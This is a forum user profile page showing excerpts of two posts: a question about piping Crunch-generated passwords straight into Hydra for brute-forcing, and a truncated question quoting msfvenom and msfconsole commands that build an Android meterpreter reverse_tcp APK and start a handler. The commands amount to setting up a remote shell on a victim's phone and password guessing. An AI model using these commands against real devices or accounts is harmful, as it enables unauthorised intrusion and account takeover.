About Mirco Maroni

Hi.

Mirco Maroni's Popular Posts

Forum Thread : Take Crunch Passwords into Output.

Hello everyone, I wanted to ask if you can get the passwords created by Crunch and insert them in the Hydra program. I do not want passwords to be saved on a wordlist, but to be inserted into the other program by themselves. Thanks everyone in advance! P.S: I use kali linux.

Forum Thread : Kali Exploit

Hi, I have Kali Linux 2017.3 and the Metasploit Framework version is metasploit v4.16.15-dev. I write: msfvenom -p android/meterpreter/reverse_tcp LHOST=(myip) LPORT=4444 R > msfandroid.apk msfconsole use exploit /multi/handler set payload android/meterpreter/reverse_tcp set L ...more

Next Page
Prev Page